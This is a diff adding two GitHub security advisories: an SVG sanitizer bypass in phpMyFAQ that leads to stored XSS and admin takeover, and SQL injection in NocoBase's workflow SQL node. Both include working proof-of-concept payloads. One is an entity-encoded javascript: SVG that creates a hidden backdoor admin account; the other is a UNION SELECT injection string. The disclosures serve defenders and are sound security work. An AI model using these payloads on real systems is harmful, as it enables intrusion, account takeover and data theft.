Publish Advisories

GHSA-5crx-pfhq-4hgg
GHSA-vx58-fwwq-5g8j

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-5crx-pfhq-4hgg/GHSA-5crx-pfhq-4hgg.json

@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5crx-pfhq-4hgg",
+  "modified": "2026-04-01T23:42:47Z",
+  "published": "2026-04-01T23:42:47Z",
+  "aliases": [
+    "CVE-2026-34974"
+  ],
+  "summary": "phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding Leads to Stored XSS and Privilege Escalation",
+  "details": "### Summary\nThe regex-based SVG sanitizer in phpMyFAQ (`SvgSanitizer.php`) can be bypassed using HTML entity encoding in `javascript:` URLs within SVG `<a href>` attributes. Any user with `edit_faq` permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover.\n\n### Details\nThe file `phpmyfaq/src/phpMyFAQ/Helper/SvgSanitizer.php` (introduced 2026-01-15) uses regex patterns to detect dangerous content in uploaded SVG files. The regex for `javascript:` URL detection is:\n\n`/href\\s*=\\s*[\"\\']javascript:[^\"\\']*[\"\\']/i`\n\nThis pattern matches the literal string `javascript:` but fails when the URL is HTML entity encoded. For example, `&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;` decodes to `javascript:` in the browser, but does NOT match the regex. The `isSafe()` method returns `true`, so the SVG is accepted without sanitization.\n\nAdditionally, the `DANGEROUS_ELEMENTS` blocklist misses `<animate>`, `<set>`, and `<use>` elements which can also be used to execute JavaScript in SVG context.\n\nUploaded SVG files are served with `Content-Type: image/svg+xml` and no `Content-Disposition: attachment` header, so browsers render them inline and execute any JavaScript they contain.\n\nThe image upload endpoint (`/admin/api/content/images`) only requires the `edit_faq` permission — not full admin — so any editor-level user can upload malicious SVGs.\n\n### PoC\n### Basic XSS (confirmed working in Chrome 146 and Edge)\n\n1. Login to phpMyFAQ admin panel with any account that has `edit_faq` permission\n2. Navigate to Admin → Content → Add New FAQ\n3. In the TinyMCE editor, click the image upload button\n4. Upload this SVG file:\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 200 200\">\n  <a href=\"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(document.domain)\">\n    <text x=\"20\" y=\"50\" font-size=\"16\" fill=\"red\">Click for XSS</text>\n  </a>\n</svg>\n```\n\n5. The SVG is uploaded to `/content/user/images/<timestamp>_<filename>.svg`\n6. Open the SVG URL directly in a browser\n7. Click the red text → `alert(document.domain)` executes\n\n### Privilege Escalation (Editor → Admin Takeover)\n\n1. As editor, upload this SVG:\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 500 300\">\n  <rect width=\"500\" height=\"300\" fill=\"#f8f9fa\"/>\n  <text x=\"250\" y=\"100\" text-anchor=\"middle\" font-size=\"22\" fill=\"#333\">📋 System Notice</text>\n  <a href=\"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;fetch('/admin/api/user/add',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({userName:'backdoor',userPassword:'H4ck3d!',realName:'System',email:'evil@attacker.com','is-visible':false}),credentials:'include'}).then(r=>r.json()).then(d=>document.title='pwned')\">\n    <rect x=\"150\" y=\"170\" width=\"200\" height=\"50\" rx=\"8\" fill=\"#0d6efd\"/>\n    <text x=\"250\" y=\"200\" text-anchor=\"middle\" font-size=\"16\" fill=\"white\">View Update →</text>\n  </a>\n</svg>\n```\n\n2. Send the SVG URL to an admin\n3. Admin opens URL, clicks \"View Update →\"\n4. JavaScript creates backdoor admin user `backdoor:H4ck3d!`\n5. Attacker logs in as `backdoor` with full admin privileges\n\n\n### Impact\nThis is a Stored Cross-Site Scripting (XSS) vulnerability that enables privilege escalation. Any user with `edit_faq` permission (editor role) can upload a weaponized SVG file. When an admin views the SVG, arbitrary JavaScript executes in their browser on the phpMyFAQ origin, allowing the attacker to:\n- Create backdoor admin accounts via the admin API\n- Exfiltrate phpMyFAQ configuration (database credentials, API tokens)\n- Modify or delete FAQ content\n- Achieve full admin account takeover\nThe vulnerability affects all phpMyFAQ installations using the `SvgSanitizer` class (introduced 2026-01-15). Recommended fix: replace regex-based sanitization with a DOM-based allowlist approach, or serve SVG files with `Content-Disposition: attachment` to prevent inline rendering.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "thorsten/phpmyfaq"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.1.1"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 4.1.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/thorsten/phpMyFAQ"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:42:47Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-vx58-fwwq-5g8j/GHSA-vx58-fwwq-5g8j.json

@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-vx58-fwwq-5g8j",
+  "modified": "2026-04-01T23:44:37Z",
+  "published": "2026-04-01T23:44:37Z",
+  "aliases": [
+    "CVE-2026-34825"
+  ],
+  "summary": "NocoBase Has SQL Injection via template variable substitution in workflow SQL node",
+  "details": "## Summary\n\nNocoBase <= 2.0.8 `plugin-workflow-sql` substitutes template variables directly into raw SQL strings via `getParsedValue()` without parameterization or escaping. Any user who triggers a workflow containing a SQL node with template variables from user-controlled data can inject arbitrary SQL.\n\n## Affected Versions\n\n- Affected: all versions through 2.0.8\n\n## Details\n\nThe `SQLInstruction` in `packages/plugins/@nocobase/plugin-workflow-sql/src/server/SQLInstruction.ts` line 28 processes SQL templates:\n\n```typescript\n// SQLInstruction.ts:28\nconst sql = processor.getParsedValue(node.config.sql || '', node.id).trim();\n```\n\nThen executes the resulting string directly:\n\n```typescript\n// SQLInstruction.ts:35\nconst [result] = await collectionManager.db.sequelize.query(sql, {\n  transaction: this.workflow.useDataSourceTransaction(dataSourceName, processor.transaction),\n});\n```\n\n`getParsedValue()` performs simple string substitution of `{{$context.data.fieldName}}` placeholders with values from the workflow trigger data. No escaping, quoting, or parameterized binding is applied.\n\nWhen an admin creates a SQL node with a template like:\n```sql\nSELECT * FROM users WHERE nickname = '{{$context.data.nickname}}'\n```\n\nAny user who triggers the workflow with a crafted value can break out of the string literal and inject arbitrary SQL.\n\n## Proof of Concept\n\n1. Login as admin\n2. Create a collection-trigger workflow on the `users` table (mode: after create)\n3. Add a SQL node with:\n```sql\nSELECT id, nickname, email FROM users WHERE nickname = '{{$context.data.nickname}}'\n```\n4. Enable the workflow\n5. Create a user with nickname set to: `' UNION SELECT 1,version(),current_user --`\n6. Check execution result:\n\n```json\n[\n  {\n    \"id\": 1,\n    \"nickname\": \"PostgreSQL 16.13 (Debian 16.13-1.pgdg13+1) on x86_64-pc-linux-gnu...\",\n    \"email\": \"nocobase\"\n  }\n]\n```\n\nThe injected UNION SELECT returned the database version and current database user.\n\n## Impact\n\nFull database read/write access through SQL injection. An attacker who can trigger a workflow with a SQL node containing template variables from user-controlled data can extract credentials, modify records, or drop tables. The severity depends on the database user's privileges (full superuser access in the default Docker deployment).\n\n## Suggested Fix\n\nUse parameterized queries. Replace direct string substitution with Sequelize bind parameters:\n\n```diff\n// SQLInstruction.ts\n- const sql = processor.getParsedValue(node.config.sql || '', node.id).trim();\n+ const { sql, bind } = processor.getParsedValueAsParams(node.config.sql || '', node.id);\n  const [result] = await collectionManager.db.sequelize.query(sql, {\n+   bind,\n    transaction: ...\n  });\n```",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@nocobase/plugin-workflow-sql"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.0.30"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.0.29"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-vx58-fwwq-5g8j"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nocobase/nocobase/commit/75da3dddc4aba739c398f7072725dcf7f5487f5c"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/nocobase/nocobase"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-01T23:44:37Z",
+    "nvd_published_at": null
+  }
+}